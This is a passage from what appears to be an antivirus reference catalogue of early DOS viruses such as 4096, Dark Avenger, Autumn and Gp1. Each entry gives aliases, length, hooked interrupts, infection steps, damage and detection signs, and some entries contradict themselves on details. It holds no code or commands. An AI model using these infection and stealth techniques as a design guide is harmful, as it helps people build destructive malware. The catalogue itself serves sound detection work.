  9630. decreases the size of free RAM memory. Infected .COM files display
  9631. 7A4Fh and 29h as their end words (flagf for other viruses, for example:
  9632. for Vacsina virus). Virus will play "Yankee Doodle" when some
  9633. conditions are met (see damage).
  9634.  
  9635. Damage: Ping-Pong virus modification: it modifies Ping-Pong virus in
  9636. memory. It changes two bytes, one jump and adds one subroutine.
  9637. (It's interesting that Ping-Pong virus is ready for this change.)
  9638. After this reboot (it writes this count to all disks), and after 255
  9639. reboots, the Ping-Pong virus immediately deactivates into memory (it
  9640. returns original interrupt vector 13h and the value of 0:413h).
  9641. Subsequently, "Yankee Doodle" is played.
  9642.  
  9643. Special features: It seems that this virus is an older version of the
  9644. 2881 virus. It is also one of a large virus group. With its level 29h
  9645. it is one of the previous releases of the same virus. It has the same
  9646. mechamism, causes the same damage (except that virus 2881 doesn't play
  9647. the melody every day, so it cannot be detected as early). The code of
  9648. virus 2881 is optimized, so the new version is shorter (about 47
  9649. bytes).
  9650.  
  9651. [3584]
  9652. Virus Name: 3584
  9653. Other Names: Fish 6
  9654. Virus Type: Parasitic Virus, Memory resident
  9655. Virus Length: 3584 bytes
  9656.  
  9657. Symptoms: Increases infected file size by 3584 bytes. Decreases the
  9658. size of free RAM memory by 6KB.
  9659.  
  9660. Damage: Virus displays the message "FISH VIRUS #6 - EACH DIFF BONN
  9661. 2/90 '~knzyvo}'" on the screen using function 9 of interrupt 21h and
  9662. halts the computer using instruction HLT.
  9663.  
  9664.  
  9665. [4096]
  9666. Virus Name: Virus 4096
  9667. Virus Type: File Virus
  9668. Virus Length: 4096 bytes
  9669.  
  9670. Execution Procedure: A boot sector will be modified if the system date
  9671. is later than September 21. The text "FRODO LIVES" will then appear on
  9672. the screen after booting from a modified disk. The virus code is
  9673. corrupted so that when you run the infected file after September 21,
  9674. the system areas will not be modified, but the virus will cause the
  9675. system to crash.
  9676.  
  9677. Damage: Virus infects .COM files shorter than 61440 bytes and .EXE
  9678. files. As a flag virus, it increases the year in the file's time stamp
  9679. by 100 years. (DOS reports only the last two digits, so it cannot be
  9680. easily recognized when, for example, the "DIR" command is executed).
  9681.  
  9682. Detection Method: The virus increases infected file size by 4096
  9683. bytes. The operating memory is decreased by about 6 KB.
  9684.  
  9685. [534]
  9686. Virus Name: 534
  9687. Virus Type: Parasitic Virus
  9688. Virus Length: 534 bytes
  9689.  
  9690. Symptoms: Virus infects .COM files in the current directory or root
  9691. directory that are longer than 256 bytes and shorter than 64000 bytes.
  9692. Increases infected file size by 534 bytes and the file contains the
  9693. string "????????.COM".
  9694.  
  9695. [April 1st]
  9696. Virus Name: April 1st
  9697. Other Names: None
  9698. Virus Type: File Virus
  9699. Virus Length: 1488 bytes
  9700.  
  9701. Execution Procedure:
  9702. 1) The virus checks whether it is already loaded resident in the
  9703.     memory. If it is not, it loads itself by hooking INT 21h.
  9704. 2) Next, it executes the original file.
  9705. 3) Once it is resident in the memory it will infect any uninfected
  9706.     file that is executed.
  9707.  
  9708. Damage: On April 1, the virus displays the message "APRIL 1ST HA HA HA
  9709. YOU HAVE A VIRUS." After displaying the message, the virus halts the
  9710. system.
  9711.  
  9712. Detection Method: April 1st increases the size of .EXE files by 1488
  9713. bytes. Infected file contains the string "SURIV." Check to see if the
  9714. file named "BUG.DAT" exists hidden in the C:\ directory.
  9715.  
  9716. Notes: Loads itself resident in the memory. An error message appears
  9717. if an I/O error (such as write protect) occurs.
  9718.  
  9719. [Autumn]
  9720. Virus Name: Autumn
  9721. Other Names: Virus 1701, Cascade-B
  9722. Virus Type: Parasitic Virus, RAM resident
  9723. Virus Length: 1701 bytes
  9724. PC Vectors Hooked: Int 21
  9725.  
  9726. Execution Procedure:
  9727. 1) The virus checks whether it is already loaded resident in the
  9728.     memory. If it isn't, it loads itself by hooking INT 21h.
  9729. 2) Next, it executes the original file.
  9730. 3) Once it is resident in the memory it will infect any uninfected
  9731.     file that is executed.
  9732.  
  9733. Damage: The Autumn virus causes characters to "fall down" the screen
  9734. (Video-RAM modification). This does not happen frequently at the
  9735. beginning but, as time goes by, the frequency of both the "fall down"
  9736. and sound effects will increase. Semigraphic characters do not fall.
  9737. Characters cannot fall over different video attributes. It doesn't
  9738. work on monochrome monitors. The virus sometimes causes the computer
  9739. to crash.
  9740.  
  9741. Detection Method: Infected files increase in size by 1701 bytes.
  9742.  
  9743. Notes: Loads itself resident in the memory. An error message appears
  9744. if an I/O error (such as write protect) occurs.
  9745.  
  9746. [Bogus-B]
  9747. Virus Name: BOGUS-B
  9748. Virus Type: File Virus (.COM and .EXE files) and
  9749.             Partition Table Infector
  9750. Virus Length: No change
  9751.  
  9752. PC Vectors Hooked: INT 21h, INT 24h, INT 13h
  9753.  
  9754. Infection Process:
  9755. 1) When you execute a file infected with the Bogus-B virus, it will
  9756.     check to see whether Sector #1 has been infected. If not, the virus
  9757.     will proceed to infect sector #1.
  9758. 2) Next, it checks whether it is loaded resident in the memory. If it
  9759.     isn't, it loads itself by hooking INT 21h and INT 13h, and then
  9760.     executes the original file.
  9761. 3) Once resident in the memory, the BOGUS-B virus can infect any
  9762.     executable programs.
  9763.  
  9764. Damage: When the number of infected files exceeds 2710h, BOGUS-B
  9765. destroys all data on the hard disk.
  9766.  
  9767. Detection Method: Check to see if the file head is INT 13h (AX=90 or
  9768. 91). If it is, check whether INT 21h is hooked. a) When starting the
  9769. system, make 21_flag=3. b) Check whether INT 21h is called by other
  9770. programs; if "yes", 21_flag is decreased by 1. c) When 21_flag=0,
  9771. BOGUS hooks INT 21h to infect other files. 2) Check for any attempts
  9772. to read sector #1; if there is, then display the original data of
  9773. sector #1. 3) Check whether AX=90 or 91; if "yes", then execute the
  9774. real interrupt.
  9775.  
  9776. Notes: BOGUS hooks INT 24h when infecting files. It omits I/O errors
  9777. (such as write protect).
  9778.  
  9779. [Bulgarian Virus]
  9780. Virus Name: Bulgarian Virus
  9781. Other Names: Virus 1800, Sofia virus, Dark Avenger
  9782. Virus Type: Parasitic Virus and Boot Strap Sector Virus
  9783. Virus Length: Approx. 1800 bytes
  9784. PC Vectors Hooked: Int 21
  9785.  
  9786. Infection Process:
  9787. 1) The virus checks whether it is already loaded resident in the
  9788.     memory. If it's not, it loads itself by hooking INT 21h.
  9789. 2) The virus then executes the original file.
  9790. 3) Once it is resident in the memory the virus will infect any
  9791.     uninfected file that is executed.
  9792.  
  9793. Damage: The virus reads the disk's boot sector, and (offset 10, OEM
  9794. decimal version) marks the number of programs which were executed
  9795. from the disk MOD 16. If it is zero (after every 16 programs!!),
  9796. it overwrites a random cluster on the disk with part of its own
  9797. code. The cluster number is then stored in the boot sector at offset
  9798. 8 (OEM main version). The modified boot sector is then written back
  9799. onto the disk.
  9800.  
  9801. Detection Method: Infected files increase by 1800 bytes.
  9802.  
  9803. Notes:
  9804. 1) Loads itself resident in the memory.
  9805. 2) Doesn't hook INT 24h when infecting files. An error message appears
  9806.     if an I/O error (such as write protect) occurs.
  9807.  
  9808. [Cannabis-B]
  9809. Virus Name: Cannabis-B
  9810. Virus Type: File Infector
  9811. Virus Length: None
  9812. PC Vectors Hooked: None
  9813.  
  9814. Execution Procedure: When a file infected with this virus is executed,
  9815. a boot virus "Cannabis" is written onto the boot sector of the A
  9816. drive.
  9817.  
  9818. Damage: see Execution Procedure above.
  9819.  
  9820. Detection Method: None
  9821.  
  9822. Notes: Cannabis doesn't hook INT 24h when infecting files. It omits
  9823. I/O errors (such as write protect).
  9824.  
  9825. [Christmas]
  9826. Virus Name: Christmas
  9827. Other Namess: Virus 600, Xmas In Japan, Japanese Christmas
  9828. Virus Type: File Virus (.COM files)
  9829. Virus Length: 600 bytes
  9830.  
  9831. Damage: When a file infected with this virus is executed on December
  9832. 25, the following message will be displayed:
  9833.  
  9834. "A Merry christmas to you" or "Jingo Bell, jingo bell, jingo all
  9835. the way."
  9836.  
  9837. Detection Method: The COMMAND.COM file increases in size by 600
  9838. bytes and infected .COM files increase in size by 600 bytes.
  9839.  
  9840. [Comp-3351]
  9841. Virus Name: Comp-3351
  9842. Virus Type: Parasitic Virus
  9843. Virus Length: 3351 bytes
  9844.  
  9845. Execution Process:
  9846. Comp-3351 searches for an .EXE file in the current directory. It then
  9847. creates a .COM file (hidden file) using the same file name as the .EXE
  9848. file. The .COM file contains the virus code with length equivalent
  9849. to 3351 bytes.
  9850.  
  9851. Damage: None
  9852.  
  9853. Detection Method: Length of the file is 3351 bytes.
  9854.  
  9855. Remarks:
  9856. 1) Non-memory resident.
  9857. 2) The virus file is compressed and cannot be recognized before
  9858.    decompression (similar to PKLITE).
  9859.  
  9860.  
  9861. [Como-B]
  9862. Virus Name: Como-B
  9863. Virus Type: File Virus (.EXE files)
  9864. Virus Length: 2020 bytes
  9865.  
  9866. PC Vectors Hooked: None
  9867.  
  9868. Execution Procedure:
  9869. 1) Searches for an .EXE file in the current directory and, once it
  9870.     locates one, it checks whether it has been infected by COMO-B.
  9871.     If the file is already infected, the virus continues to look for
  9872.     any uninfected .EXE file.
  9873. 2) COMO-B infects files one at a time.
  9874. 3) After infecting three files, the following message appears:
  9875.  
  9876.     "This is the ...COMO-LAKE .. virus(rel . 1 1).........I'm a
  9877.     non-destructive virus developed to study the worldwide diffusion
  9878.     rate. I was released in September 1990 by a software group
  9879.     resident near Como lake (north Italy) .....Don't worry about your
  9880.     data on disk. My activity is limited only .. to auto-transferring
  9881.     into other program files. Perhaps you've got .. many files
  9882.     infected. Press a key to execute the prompt.
  9883.  
  9884. Damage: None
  9885.  
  9886. Detection Method: Infected files increase by 2020 bytes.
  9887.  
  9888. Notes:
  9889. 1) Doesn't stay resident in the memory.
  9890. 2) COMO doesn't hook INT 24h when infecting files. An error message
  9891.     appears if an I/O error (such as write protect) occurs.
  9892.  
  9893. [Dark_Avenger]
  9894. Virus Name: Dark_Avenger
  9895. Alias: Eddie
  9896. Virus Type: File Infector (.COM and .EXE files)
  9897. Virus Length: 1,800 bytes
  9898. PC Vectors Hooked: INT 21h
  9899.  
  9900. Infection method: When an infected file is executed, the virus loads
  9901. itself in the memory. While loaded, it infects accessed, executable
  9902. files. Infected files increase by 1800 bytes.
  9903.  
  9904. Damage: The virus reads the disk's boot sector and marks the number
  9905. of programs executed from the disk. After every 16 programs, it
  9906. overwrites a random cluster on the disk with part of its own code.
  9907. The infected files contain these strings:
  9908.  
  9909. "Eddie lives...somewhere in time! Diana P."
  9910.  
  9911. "This program was written in the city of Sofia (C) 1988-89 Dark
  9912. Avenger."
  9913.  
  9914. [Data Crime IIB]
  9915. Virus Name: Datacrime II b
  9916. Other names: None
  9917. Virus Type: File Virus
  9918. Virus Length: 1460 bytes
  9919.  
  9920. Damage: The virus will low-level format cylinder 0 of your hard disk
  9921. after October 12.
  9922.  
  9923. Detection Method: Between October 12-31, excluding Mondays, the virus
  9924. will display the following message: "DATACRIME-2 VIRUS." The virus will
  9925. then low-level format cylinder 0 of the hard disk. The system will then
  9926. halt.
  9927.  
  9928.  
  9929. [Deiced]
  9930. Virus Name: Deiced
  9931. Virus Type: File Infector, Highest Memory Resident ( .COM files only)
  9932. Virus Length: 2333 bytes
  9933. PC Vectors Hooked: INT 21h, INT 24h
  9934.  
  9935. Execution Procedure:
  9936. 1) Checks whether or not the virus has been loaded resident in the high
  9937.     memory. If not, it loads itself onto the highest memory by hooking
  9938.     INT 21h.
  9939. 2) It checks whether the file COMMAND.COM has been infected.
  9940.     If not, the virus infects it.
  9941. 3) Deiced checks the system date and, if it is the 15th of January,
  9942.     April or August, the virus will damage all files on the system disk.
  9943.  
  9944. Infection Procedure: The virus infects a .COM file by hooking the
  9945. AX=4B00h call (if the file is not infected). When the command "DIR"
  9946. is executed, the virus will look for all uninfected files in the
  9947. directory and proceed to infect them. Deiced hooks INT 24h to hide
  9948. itself while infecting.
  9949.  
  9950. Damage: If the system date is the 15th of January, April or August,
  9951. the virus will damage all files on the system disk.
  9952.  
  9953. Detection Method: Infected files increase by 2333 bytes.
  9954.  
  9955.  
  9956. [Dropper-4]
  9957. Virus Name: DROPPER-4
  9958. Virus Type: File Infector (.COM and .EXE files)
  9959. Virus Length: 1125 bytes
  9960. PC Vectors Hooked: INT 24h
  9961.  
  9962. Execution Procedure:
  9963. 1) The virus searches for an uninfected .COM or .EXE file in the
  9964.     current directory.
  9965. 2) Infects files in the current directory two at a time.
  9966. 3) Executes the original file.
  9967.  
  9968. Damage: None
  9969.  
  9970. Detection Method: Infected files increase by 1125 bytes.
  9971.  
  9972. Notes:
  9973. 1) Doesn't stay resident in the memory.
  9974. 2) Dropper-4 hooks INT 24h when infecting files. It omits I/O
  9975.     errors (such as write protect).
  9976.  
  9977. [Ell]
  9978. Virus Name: ELL
  9979. Other names: None
  9980. Virus Type: File Infector (.COM and .EXE files)
  9981. Virus Length: 1237-1246 bytes (EXE files)
  9982.               1237 bytes (COM files)
  9983.  
  9984. PC Vectors Hooked: INT 21h
  9985.  
  9986. Execution Procedure:
  9987. 1) Checks whether or not it is memory resident. If not, it loads
  9988.    itself resident in the memory by hooking INT 21h.
  9989. 2) It then executes the original file.
  9990. 3) Once resident in the memory it will infect any uninfected file
  9991.    that is executed.
  9992.  
  9993. Damage: None
  9994.  
  9995. Detection Method: Increases infected file size by 1237/1246 bytes.
  9996.  
  9997. Notes:
  9998. Loads itself resident in the memory. An error message appears if
  9999. there is an I/O error (such as write protect).
  10000.  
  10001.  
  10002. [Elvis]
  10003. Virus Name: Elvis
  10004. Virus Type: File Infector (.COM files)
  10005. Virus Length: 1250 bytes
  10006.  
  10007. PC Vectors Hooked: INT 8h
  10008.  
  10009. Execution Procedure:
  10010. 1) The virus searches for uninfected COM files in the current
  10011.    directory, and infects them three at a time.
  10012. 2) Hooks INT 8h and executes the original file.
  10013.  
  10014. Damage: About eight (8) minutes after the virus is executed, one of
  10015. these messages appears on the screen: 1) "Elvis lives!" 2) "ELVIS is
  10016. watching!" 3) "Don maybe he lives here!.....," and so on.
  10017.  
  10018. Detection Method: Infected files increase by 1250 bytes.
  10019.  
  10020. Notes:
  10021. 1) Doesn't stay resident in the memory.
  10022. 2) Elvis doesn't hook INT 24h when infecting files. It omits I/O errors
  10023.    (such as write protect).
  10024.  
  10025.  
  10026. [F3]
  10027. Virus Name: F3
  10028. Virus Type: Memory Resident, File Virus (.COM and .EXE files)
  10029. Virus Length: 50406 bytes
  10030.  
  10031. PC Vectors Hooked: INT 21h, AX=4B00h (execute program), INT 24h
  10032.  
  10033. Infection Procedure:
  10034. 1) Checks whether it is memory resident. If not, it loads itself
  10035.    resident in the highest memory by hooking INT 21h.
  10036. 2) Checks the system date. If the date is April 1, two lines of code
  10037.    will appear on the screen.
  10038. 3) Executes the original file.
  10039. 4) Once memory resident it will infect any uninfected file that is
  10040.    executed.
  10041.  
  10042. Damage: None
  10043.  
  10044. Detection Method: Infected files increase by 50406 bytes.
  10045.  
  10046. Notes: The F3 virus hooks INT 24h when infecting files. It omits I/O
  10047. errors (such as write protect).
  10048.  
  10049.  
  10050. [Flip-B]
  10051. Virus Name: Flip-B
  10052. Virus Type: File and Partition Table Infector Virus
  10053. Virus Length: 2153 bytes
  10054.  
  10055. PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch
  10056.  
  10057. Execution Procedure:
  10058. 1) When you execute a file infected with Flip-B, the virus checks
  10059.    whether Sector #1 on the hard drive is infected. If not, the virus
  10060.    infects it.
  10061. 2) Checks whether it is memory resident. If not, it loads itself
  10062.    resident in the memory by hooking INT 21h and INT 1Ch.
  10063. 3) It infects files as they are executed.
  10064.  
  10065. Damage: You may not be able to boot up the machine from the hard disk.
  10066.  
  10067. Detection Method: Infected files increase by 2153 bytes.
  10068.  
  10069. INT 1Ch: Detects whether INT 21h is constantly hooked by another
  10070. program.
  10071.  
  10072. Notes: Flip-B hooks INT 24h when infecting files, omitting I/O errors
  10073. such as write protect.
  10074.  
  10075.  
  10076. [Gp 1]
  10077. Virus Name: Gp1
  10078. Virus Type: Network Specific Virus
  10079. Virus Length: 1557 bytes (EXE files)
  10080.               1845 bytes (COM files)
  10081.  
  10082. Execution Procedure:
  10083. 1) Checks whether it is memory resident. If not, it loads itself
  10084.    resident in the highest memory by hooking INT 21h.
  10085. 2) Executes the original file.
  10086. 3) Once memory resident it will infect any uninfected file that
  10087.    is executed.
  10088.  
  10089. Symptoms: If the virus is active in the memory and if the first
  10090. character on the command line is not an "i", the virus removes itself
  10091. from the operating memory (this will work only if the virus is the last
  10092. TSR to change interrupt vector 21h) and displays the message "GP1
  10093. Removed from memory."
  10094.  
  10095. Damage: None. Gp1 is the only known LAN virus. This unique virus is a
  10096. modification of the Jerusalem virus and was created for one special
  10097. purpose: to penetrate Novell security features and spread inside the
  10098. network. The virus does not contain any manipulation (if we do not
  10099. count the monitoring of Novell LOGIN and the attempts to break the
  10100. Novell security features).
  10101.  
  10102. [Hiccup]
  10103. Virus Name: Hiccup
  10104. Aliases: Comp-3351
  10105. Virus Type: Parasitic Virus (infects .EXE files)
  10106. Virus Length: 3351 bytes
  10107.  
  10108. Execution Procedure:
  10109. 1) Hiccup searches for an .EXE file in the current directory.
  10110. 2) Creates a *.COM file (hidden file) consisting of the virus itself.
  10111.     When executed, the *.COM file executes, then returns to the
  10112.     original routine.
  10113.  
  10114. Damage: None
  10115.  
  10116. Detection Method: File length is 3351 bytes.
  10117.  
  10118. Notes:
  10119. 1) Non-memory resident.
  10120. 2) The virus file is compressed and cannot be recognized without
  10121.     decompression (similar to PKLITE).
  10122.  
  10123. [Icelandic]
  10124. Virus Name: Icelandic
  10125. Other names: Saratoga
  10126. Virus Type: File Virus
  10127. Virus Length: 642 bytes (EXE)
  10128.  
  10129. Execution Procedure:
  10130. 1) Checks whether it is memory resident. If not, it loads itself
  10131.     resident in the memory by hooking INT 21h.
  10132. 2) It then executes the original file.
  10133. 3) Once memory resident it will infect any uninfected file that is
  10134.     executed. Doesn't infect .COM files.
  10135.  
  10136. Damage: Infected .EXE files increase by 642 bytes.
  10137.  
  10138. Note:
  10139. 1) The virus loads itself resident in the memory.
  10140. 2) Doesn't hook INT 24h when infecting files.
  10141. 3) An error message appears if an I/O error (such as write protect)
  10142.     occurs.
  10143.  
  10144. [Inok-2371]
  10145. Virus Name: Inok-2371
  10146. Virus Type: Parasitic Virus
  10147. Virus Length: Infected .COM files increase by 2372 bytes
  10148.                      (does not infect EXE files)
  10149. PC Vectors Hooked: None
  10150.  
  10151. Execution Procedure: Randomly does one of the following:
  10152. 1) Searches for an uninfected .COM file in the current directory.
  10153.     Infects the file if there is one (infects only one file at a
  10154.     time), and/or executes the host program.
  10155. 2) Creates a file named ICONKIN.COM in the current directory and then
  10156.     runs it. (It will not infect any files. It will display a small
  10157.     window repeatedly until a key is pressed. And, the small window
  10158.     will show up after a period of time. While the small window is on
  10159.     the screen, everything will be forced to wait.)
  10160.  
  10161. Infection Procedure:
  10162. 1) The virus infects files by AH=4B in INT 21h. When an uninfected
  10163.     file is executed, the virus infects it.
  10164. 2) Lycee hooks INT 24h before infecting files to ignore I/O errors.
  10165.  
  10166. Damage: Refer to Execution Procedure 2).
  10167.  
  10168. Detection Method:
  10169. 1) Check for the small window described in Execution Procedure 2).
  10170. 2) Infected files increase by 2372 bytes.
  10171.  
  10172. Remarks:
  10173. 1) Non-memory resident.
  10174. 2) When infecting files, the virus does not hook INT 24h. An error
  10175.     message will appear when I/O errors occur.
  10176.  
  10177. [J-Infect]
  10178. Virus Name: J-Infect
  10179. Virus Type: Memory Resident, File Virus (.COM and .EXE files)
  10180. Virus Length: 12080 bytes
  10181.  
  10182. PC Vectors Hooked: INT 21h
  10183.  
  10184. Execution Procedure:
  10185. 1) This is similar to the "JERUSALEM" virus in that it infects the same
  10186.    types of files.
  10187.  
  10188. Detection Method: Infected files increase by 10280 bytes.
  10189.  
  10190.  
  10191. [Joanna]
  10192. Virus Name: JOANNA
  10193. Aliases: None
  10194. Virus Type: File Infector
  10195. Virus Length: 986 bytes
  10196.  
  10197. Execution Procedure:
  10198. 1) Checks whether it is memory resident. If not, it loads itself
  10199.     resident in the memory by hooking INT 21h.
  10200. 2) It then executes the original file.
  10201. 3) Once memory resident it will infect any uninfected file that is
  10202.     executed.
  10203.  
  10204. Detection Method:
  10205. 1) Virus displays the message "I love you Joanna, Apache...."
  10206. 2) Infected files increase by 986 bytes.
  10207.  
  10208. Note: Loads itself resident in the memory. An error message appears
  10209. if an I/O error (such as write protect) occurs.
  10210.  
  10211. [July 4]
  10212. Virus Name: July 4, Stupid 1
  10213. Virus Type: File Infector (.COM files)
  10214. Virus Length: 743 bytes
  10215.  
  10216. Execution Procedure:
  10217. 1) If the word at address 0000:01FEh is FFFFh, the virus will not
  10218.     infect any file. Otherwise, it infects all uninfected .COM files
  10219.     on the current directory. If the number of infections is less than
  10220.     2, it will proceed to infect .COM files on the upper directory
  10221.     until more than two files are infected or until it has reached the
  10222.     root directory.
  10223. 2) If the current date is July 4 and current time is either 0:00am,
  10224.     1:00am, 2:00am, 3:00am, 4:00am, or 5:00am, the virus will destroy
  10225.     data on the current diskette.
  10226.  
  10227. Detection Method:
  10228. 1) The date and time fields of infected files are changed.
  10229. 2) The byte at 0003h of an infected .COM file is 1Ah.
  10230. 3) Infected .COM files display one of the following messages:
  10231.     "Abort, Retry, Ignore, Fail?" , "Fail on INT 24"
  10232.     (2) - "Impotence error reading users disk"
  10233.     (0) - "Program too big to fit in memory"
  10234.     (1) - "Cannot load .COMMAND, system halted"
  10235.     (3) - "Joker!" and "*.com."
  10236.  
  10237. [K]
  10238. Virus Name: N1
  10239. Virus Type: COM File infector
  10240. Virus Length: 10230-10240 bytes
  10241.  
  10242. Execution Procedure:
  10243. 1) Searches for an uninfected COM file in the current directory, then
  10244.    infects it (only infects one file at a time).
  10245. 2) It then displays the following message:
  10246.  
  10247.    "This File Has Been Infected By NUMBER One!"
  10248.  
  10249. Damage: None
  10250.  
  10251. Note:
  10252. 1) It does not stay resident in the memory.
  10253. 2) An error message will appear when writing because INT 24h has not
  10254.    been hanged.
  10255.  
  10256. Detection Method:
  10257. 1) Infected files will display the above message when executed.
  10258.  
  10259. [Kill COM]
  10260. Virus Name: Killcom
  10261. Virus Type: File Virus
  10262. Virus Length: 31648 Bytes
  10263. PC Vectors Hooked: None
  10264.  
  10265. Execution Procedure:
  10266. 1) Looks for COMMAND.COM in the current directory of C:\.
  10267. 2) If found, corrupts this file. If not, creates a COMMAND.COM file
  10268.     with 213 Bytes.
  10269.  
  10270. Damage: Corrupts the COMMAND.COM file in the current directory of
  10271. C:\.
  10272.  
  10273. Detection Method: None
  10274.  
  10275. Note:
  10276. 1) Doesn't stay resident in the memory.
  10277. 2) Doesn't hook INT 24h when infecting files. An error message
  10278.     appears if there is an I/O error (such as write protect).
  10279.  
  10280. [LB-Demonic]
  10281. Virus Name: lb-Demonic
  10282. Virus Type: File Virus (infects .COM files)
  10283. Virus Length: No change
  10284. PC Vectors Hooked: None
  10285.  
  10286. Execution Procedure:
  10287. 1) Infects all uninfected .COM files in the current directory.
  10288. 2) When the file is executed this message appears: "EXEC FAILURE"
  10289. 3) Checks the system date. If it is Tuesday, the virus renames
  10290.     COMMAND.COM in C:\ to COMMAND.C0M ("O" in .COM changed to "0").
  10291. 4) Displays this message: "Error reading drive C:\ ... BillMeTuesday"
  10292.  
  10293. Damage:
  10294. 1) Renames COMMAND.COM to COMMAND.C0M, so the system can't start
  10295.     from the disk.
  10296. 2) Overwrites original files, so infected files won't increase in
  10297.     length.
  10298.  
  10299. Note:
  10300. 1) Doesn't stay resident in the memory.
  10301. 2) Doesn't hook INT 24h when infecting files. Error message appears
  10302.     if there is an I/O error (such as write protect).
  10303.  
  10304. [Mixer 1A]
  10305. Virus Name: Mixer 1A
  10306. Other names: Virus 1618
  10307. Virus Type: File Virus
  10308. Virus Length: Approximately 1618 bytes
  10309. PC Vectors Hooked: Int 21
  10310.  
  10311. Execution Procedure:
  10312. 1) Checks whether it is memory resident. If not, it loads itself
  10313.     resident in the memory by hooking INT 21h.
  10314. 2) It then executes the original file.
  10315. 3) Once memory resident, it will infect any uninfected file that is
  10316.     executed.
  10317.  
  10318. Damage: The mixture of characters sent to the serial or parallel port
  10319. using BIOS functions is the main damage routine of this virus. All
  10320. bytes sent to the port are translated using the virus' own table.
  10321.  
  10322. Fifty (50) minutes after the virus is installed into memory, the
  10323. keyboard routine is activated. From this time on, CapsLock will be
  10324. set to OFF, and Numlock will be set to ON. The virus will check
  10325. whether the "Ctrl", "Alt", and "Del" keys are simultaneously
  10326. depressed. If this is the case, the virus will suppress the "Alt"
  10327. command and activate a routine for screen manipulation. However, the
  10328. virus will call the routine in the wrong manner.
  10329.  
  10330. In text mode, the virus changes all attributes of video page 0. It will
  10331. add 1 to all attributes and after 256 the virus will reset itself. Sixty
  10332. (60) minutes after the virus is installed in the memory, it will display
  10333. a bouncing ball similar to the one seen in the Ping-Pong virus. The ball
  10334. is marked "o" and its movement is controlled by the BIOS (interrupt 10h).
  10335.  
  10336. Note:
  10337. 1) An error message appears if there is an I/O error (such as
  10338.     write protect).
  10339.  
  10340. [Multi-2B]
  10341. Virus Name: Multi-2-B
  10342. Virus Type: File Virus (infects .COM and .EXE files) and
  10343.                    Partition Table Infector
  10344. Virus Length: 927 Bytes (COM files), about 1000 Bytes (EXE files)
  10345. PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch, INT 13h
  10346.  
  10347. Execution Procedure:
  10348. 1) When you execute an infected file, the virus infects Sector #1 (if
  10349.     not yet infected) of the hard disk.
  10350. 2) Checks whether it is memory resident. If not, it infects Sector #1
  10351.     and then exits. If it is, executes the original program.
  10352.  
  10353. Damage: None
  10354.  
  10355. Detection Method: Infected files increase by 927-1000 Bytes.
  10356.  
  10357. Note:
  10358. 1) Multi-2 hooks INT 24h when infecting files.
  10359. 2) Omits I/O errors (such as write protect).
  10360.  
  10361.  
  10362. [Necro-B]
  10363. Virus Name: Necro-B
  10364. Virus Type: File Virus (infects .EXE and .COM files)
  10365. Virus Length: 696 Bytes (COM and EXE)
  10366. PC Vectors Hooked: None
  10367.  
  10368. Execution Procedure:
  10369. 1) Searches for uninfected .COM and .EXE files in the current
  10370.     directory, and infects them three files at a time.
  10371.  
  10372. Damage: None
  10373.  
  10374. Detection Method:
  10375. 1) Infected files increase by 696 Bytes.
  10376.  
  10377. Note:
  10378. 1) Doesn't stay resident in the memory.
  10379. 2) Doesn't hook INT 24h when infecting files. Error message
  10380.     appears if there is an I/O error (such as write protect).
  10381. 3) Infected files can't execute or infect other files.
  10382.  
  10383.  
  10384. [No Wednesday]
  10385. Virus Name: NO-WEDNESDAY
  10386. Virus Type: File Virus (infects .COM files)
  10387. Virus Length: 520 Bytes (COM)
  10388. PC Vectors Hooked: INT 24h
  10389.  
  10390. Execution Procedure:
  10391. 1) Searches for uninfected COM files in the current directory and
  10392.     infects them one at a time.
  10393. 2) Displays the message: "file not found."
  10394.  
  10395. Damage: Infected files can not execute original file.
  10396.  
  10397. Detection Method:
  10398. 1) Infected files increase by 520 Bytes.
  10399. 2) "file not found" message appears on the screen.
  10400.  
  10401. Note:
  10402. 1) Doesn't stay resident in the memory.
  10403. 2) Hooks INT 24h when infecting files. Omits I/O error (such as
  10404.     write protect).
  10405.  
  10406. [Prudent]
  10407. Virus Name: Prudent
  10408. Other names: 1210
  10409. Virus Type: File Virus
  10410. Virus Length: 1210 bytes (EXE files)
  10411.  
  10412. Execution Procedure:
  10413. 1) Checks whether it is memory resident. If not, it loads itself
  10414.     resident in the memory by hooking INT 21h.
  10415. 2) It then executes the original file.
  10416. 3) Once memory resident it will infect any uninfected file that is
  10417.     executed. Doesn't infect .COM files.
  10418.  
  10419. Damage: Overwrites original files.
  10420.  
  10421. Detection Method: From May 1-4, the virus will frequently check the
  10422. disk, thus causing abnormal disk activity.
  10423.  
  10424. Note:
  10425. 1) Loads itself resident in the memory.
  10426. 2) An error message appears if there is an I/O error (such as write
  10427.     protect).
  10428.  
  10429. [Sandwich]
  10430. Virus Name: SANDWICH
  10431. Virus Type: Highest Memory Resident, File Virus (infects .COM files)
  10432. Virus Length: 1172 Bytes (COM)
  10433. PC Vectors Hooked: INT 21h, AX=4B00h (execute program)
  10434.  
  10435. Infection Procedure:
  10436. 1) Checks whether it is memory resident. If not, it loads itself
  10437.     resident in the memory by hooking INT 21h.
  10438. 2) It then executes the original file.
  10439. 3) While memory resident it infects any uninfected file that is
  10440.     executed. Doesn't infect .EXE files.
  10441.  
  10442. Damage: None
  10443.  
  10444. Detection Method: Infected files increase by 1172 Bytes.
  10445.  
  10446. Note: The Sandwich virus doesn't hook INT 24h when infecting files.
  10447. An error message appears if there is an I/O error (such as write
  10448. protect).
  10449.  
  10450. [Scythe-2d]
  10451. Virus Name: Scythe-2d
  10452. Virus Type: Boot Virus
  10453. PC Vectors Hooked: INT 13h
  10454.  
  10455. Execution Procedure:
  10456. 1) Modifies the memory size, decreasing the real memory size by 1K.
  10457. 2) Installs itself resident in the memory (in the last 1K of the
  10458.     memory).
  10459. 3) Hooks INT 13h.
  10460. 4) Returns the control to DOS and the system boots normally.
  10461.  
  10462. Damage: None
  10463.  
  10464. Note:
  10465. 1) When booting the system with a floppy disk, the virus will first
  10466.     check whether the hard disk is infected. If not, the virus will
  10467.     infect it.
  10468. 2) INT 13h: checks for any request for the contents of the boot sector
  10469.     or partition table. If such request exists, the virus will return
  10470.     the uninfected, original data.
  10471.  
  10472. [Sunday]
  10473. Virus Name: Sunday
  10474. Other Names: None
  10475. Virus Type: Boot Strap Sector Virus (Memory Resident)
  10476. Virus Length: 1636 bytes
  10477.  
  10478. Damage: The infected system becomes unusable every Sunday.
  10479.  
  10480. Detection Method: Every Sunday, the virus displays the following
